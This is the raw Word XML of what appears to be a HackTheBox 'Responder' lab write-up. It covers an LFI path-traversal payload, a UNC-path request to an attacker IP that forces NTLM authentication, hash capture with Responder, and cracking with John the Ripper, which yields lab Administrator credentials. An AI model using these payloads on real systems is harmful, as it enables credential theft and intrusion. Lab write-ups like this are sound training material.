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1E90FF"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB — Responder Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox | Penetration Testing Lab Writeup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="60" w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab demonstrates how Local File Inclusion (LFI) vulnerabilities can be leveraged to capture NTLM authentication hashes using Responder, and how these hashes can be cracked to gain full system access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Information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Value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222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">unika.htb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22222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Technology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PHP</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222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion (LFI)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22222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Auth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NTLM / NetNTLMv2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The process started with basic reconnaissance of the target web service using Nmap and browser-based analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server redirects users to the domain unika.htb.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The website is generated using PHP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A URL parameter named page is used to load different language pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Example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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">http://unika.htb/index.php?page=french.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The page parameter is vulnerable to Local File Inclusion (LFI). By manipulating the parameter, an attacker can traverse the directory structure and read arbitrary files from the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI Payload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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows reading local files on the Windows server, confirming the LFI vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM Hash Capture with Responder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By exploiting the LFI vulnerability with a UNC path pointing to the attacker's machine, the server is forced to authenticate using NTLM, leaking the NetNTLMv2 hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">http://unika.htb/index.php?page=//10.10.14.6/somefile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Responder on the attack machine, listening on the tun0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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">responder -I tun0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger the LFI payload via the browser or curl pointing to the attacker IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder intercepts the NTLM authentication and captures the NetNTLMv2 hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The captured NetNTLMv2 hash is saved to a file and cracked offline using John the Ripper with the rockyou wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Username : Administrator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Password : badminton</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With valid credentials recovered, we can connect to the target system remotely using WinRM (Windows Remote Management).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00BFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">WinRM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A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP Port 5985</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WinRM allows command execution on Windows systems over HTTP/HTTPS, making it a prime target once credentials are obtained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">What I Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How LFI (Local File Inclusion) vulnerabilities work and how to identify them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between LFI (local) and RFI (Remote File Inclusion) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How NTLM authentication can be abused through forced UNC path requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capturing NetNTLMv2 hashes using Responder via LLMNR/NBT-NS poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking password hashes offline using John the Ripper and wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding WinRM remote access and its role in post-exploitation on Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
